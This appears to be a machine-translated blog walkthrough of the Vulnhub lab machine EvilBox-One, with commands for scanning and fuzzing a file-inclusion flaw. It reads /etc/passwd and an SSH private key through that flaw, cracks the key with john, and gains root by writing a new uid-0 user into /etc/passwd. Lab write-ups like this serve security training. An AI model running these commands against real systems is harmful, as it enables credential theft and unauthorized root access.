当前位置:网站首页>After reading this article, I will teach you to play with vulnhub, the penetration test target machine -- evilbox one
After reading this article, I will teach you to play with vulnhub, the penetration test target machine -- evilbox one
2022-07-18 22:28:00 【Lonely fish】
Vulnhub Drone aircraft Web1 Penetration test details
Vulnhub Introduction to target machine :
vulnhub It is a comprehensive shooting range providing various vulnerability platforms , A variety of virtual machines can be downloaded , Local VM Open the can , Complete the penetration test like a game 、 Raise the right 、 Exploit 、 Code audit and other interesting actual combat .
As always, we need to find flag that will do .
Vulnhub Target download :
Official website address :https://download.vulnhub.com/evilbox/EvilBox—One.ova
Vulnhub Target installation :
After downloading, unzip the installation package And then use Oracle VM Open the can .

Vulnhub Detailed explanation of target vulnerability :
①: information gathering :
kali Use in netdiscover Discover the host 
Infiltration machine :kali IP :192.168.0.101 Drone aircraft IP :192.168.0.106
Use command :
nmap -sS -sV -A -n 192.168.0.106
Discovery turned on 22 Port and 80 port Visit 80 The port is apache Default page direct dirb Sweep the backstage 

Let's visit first robots.txt There seems to be little information available Then scan dirb http://192.168.0.106/secret -X .php,.xml,.html


visit /secret/evil.php Found no information , But I feel this evil It means evil Use ffuf Fuzzy test .
②: Vulnerability discovery :
apt-get install ffuf## Installation tools

ffuf -c -r -u 'http://192.168.0.106/secret/evil.php?FUZZ=/etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/common.txt -fs 0
192.168.0.106/secret/evil.php?command = /etc/passwd

③:ssh Private key explosion :
Found to have mowree user , stay mowree There are... In the user directory ssh Public key , Try to create a private key login ssh
http://192.168.0.106/secret/evil.php?command=/home/mowree/.ssh/id_rsa

Put this string ssh Copy the private key to kaili Give authority And crack the password Otherwise, you can't log in

cd /usr/share//john/
./ssh2john.py id_rsa | tee hash
john hash --wordlist=rockyou.txt

I've tried this many times I don't know why I can't crack it ( If you know why, you can send a private message ) Read other people's articles Get the code :unicorn
ssh [email protected] -i id_rsa
④: Raise the right :
Use command :find / -perm /4000 2>/dev/null
Use command :find / -perm /2000 2>/dev/null 2000


Find nothing to use Using command :find / -writable 2>/dev/null | grep -v proc Find out /etc/passwd Have write permission

General idea : Since you have write permission Sure openssl Generate the password Then edit /etc/passwd Generative hack The settings behind the encryption and root Just the same .
[email protected]:~$ openssl passwd -1 123456 #-1 Represents an encryption method
$1$Nu2rm2O8$GpQ5CebG16r7RbLNmFQdO/
hack:$1$Nu2rm2O8$GpQ5CebG16r7RbLNmFQdO/:0:0:root:/root:/bin/bash
vi /etc/passwd ## write in
cat /etc/passwd # Test for success !
ps:( Attention! there Red arrow basH Capitalized In fact, there was no No big problem )
su Switch hack Account password :123456 Just set Then is id Found to be root jurisdiction
⑤: obtain flag:

So far, we have obtained all flag, End of penetration test .
Vulnhub Target penetration summary :
1.ffuf Use of tools for fuzzy testing ( Tools are powerful !!)
2.openssl Raise the right Before this DC Series has also been done
3. adopt SSH Private key login and id_rsa Cracking the private key requires shh2john Script ( But I got stuck here and can't crack it )
Knowledge point :
General user's .ssh There will be three files in the directory :
id_rsa: Private keyauthorized_keys: Authentication keyword fileid_rsa.pub: Public key
Because of the summer vacation, I haven't had a target machine for a long time Update it on a whim today It will be updated continuously in the future , It's not easy to create I hope that's helpful If you like it, please give me one button three times Your happiness is my greatest happiness !!
边栏推荐
- 数据库常遇到的问题
- PHP 内存溢出 ?如何解决呢 ?
- Practical application of machine learning: quickly brush five machine learning problems of Niuke
- 除了长安,这四个国产品牌也用“雷克萨斯脸”,中国设计倒退了?
- 迪奥疑似抄袭中国马面裙,国内官网已下架该产品
- What is pa? Construct the structural element of the virus, Polya, a repeated base sequence
- 博途PLC模糊PID在双容水箱液位控制上的应用(模糊和普通PID切换功能FB)
- UCOSII里面为什么调用OS_ENTER_CRITICAL()或OS_EXIT_CRITICAL()会出错,出错信息为:undeclared identifier `cpu_sr‘
- Graduation season -- common interview questions in database
- ICCV 2021 的最佳论文模型 Swin Transformer 终于对视频下手了!
猜你喜欢

Leetcode 1309. Decode letter to integer mapping (yes, once)

Open source ten questions, a quick start guide for community newcomers

uniapp基础知识

ICCV 2021 的最佳论文模型 Swin Transformer 终于对视频下手了!
![[sequential reading and writing of data files in C language]](/img/b0/13b57edfbcb7a1aa728811eaa0c9bd.png)
[sequential reading and writing of data files in C language]

迪奥疑似抄袭中国马面裙,国内官网已下架该产品

千亿元宇宙市场,Soul、映客的新动力

What kind of wireless Bluetooth headset is good? Bluetooth headset with the best comprehensive performance

活动回顾 | 与MindSpore深度畅聊:开源如何探索AI领域全场景

Four knapsack problems of dynamic programming
随机推荐
The mobile terminal is set with fonts smaller than 12px and script labels
快速解决MySQL插入中文数据时报错或乱码问题
Uniapp Basics
技術幹貨| MindSpore新一代自主研發分子模擬庫:Mind-Sponge
KDD 2017 | metapath2vec:异质图的可扩展表示学习
Dcat Admin 代码生成器应用(重新编辑)
Arduino window garbled
Information system project manager must recite the core examination site (44) planning risk response
大疆校招测评题--循环赛问题
Huawei od JS log sorting
How to use mitmproxy to get data return in automated testing
[UCOS III source code analysis] - Software Timer
21届毕业生毕业一年内的真实工作状态
[UCOS III source code analysis] - semaphore
除了长安,这四个国产品牌也用“雷克萨斯脸”,中国设计倒退了?
Win11预览版更新错误怎么办?Win11预览版安装失败的解决方法
Swin transformer, the best paper model of iccv 2021, finally started with video!
技术干货 | 模型优化精度、速度我全都要!MindSpore模型精度调优实战(二)
Huawei od JS splicing URL
mapbox-gl加载3dtiles渐变模型(视频)

